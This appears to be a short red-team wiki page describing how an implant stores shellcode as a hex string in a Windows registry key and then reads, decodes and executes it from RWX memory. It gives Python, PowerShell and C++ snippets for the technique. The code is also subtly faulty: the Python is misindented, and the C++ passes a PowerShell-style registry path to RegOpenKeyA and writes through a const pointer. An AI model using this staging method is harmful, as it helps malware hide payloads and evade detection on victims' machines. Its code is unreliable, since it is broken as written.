# Registry Keys

We will store our shellcode as a ASCII string in registry and in our implant, we will read the registry key, convert that string back into hex, and execute that.

To convert your shellcode into an ASCII string, we can use this snippet of code:

```python
try:
	with open(sys.argv[1]) as shellcode:
    bytes = bytearray(shellcode.read())
	shellcode.close()
except IOError:
    print("Error reading file")
    print("".join("{:02X}".format(c) for c in bytes))
```

You will get an ASCII string in the output, we can put this in registry key so 

```
New-ItemProperty -Path "HKCU:\SOFTWARE\regkey" -Name "Name" -Value "ASCIISTRING" -PropertyType String -Force
```

In our C Code, we can extract the shellcode from registry like so.

```cpp
DWORD dwRegistryEntryOneLen;
DWORD dwAllocationSize = shellcodesize;
LPCSTR lpData = (LPCSTR)VirtualAlloc(NULL, dwAllocationSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

DWORD dwType = REG_SZ;
HKEY hKey = 0;
LPCSTR subkey = "HKCU:\SOFTWARE\regkey";
RegOpenKeyA(HKEY_CURRENT_USER,subkey,&hKey);
RegQueryValueExA(hKey, "Name", NULL, &dwType, (LPBYTE)lpData, &dwAllocationSize);

LPCSTR decodedShellcode = (LPCSTR)VirtualAlloc(NULL,dwAllocationSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

LPCSTR tempPointer = decodedShellcode;
	for (int i = 0; i < dwAllocationSize/2; i ++) {
		sscanf_s(lpData+(i*2), "%2hhx", &decodedShellcode[i]);
	}
```

Shellcode will be stored in decodedShellcode variable.&#x20;

We can then create a thread executing our shellcode or do whatever is applicable to your situation.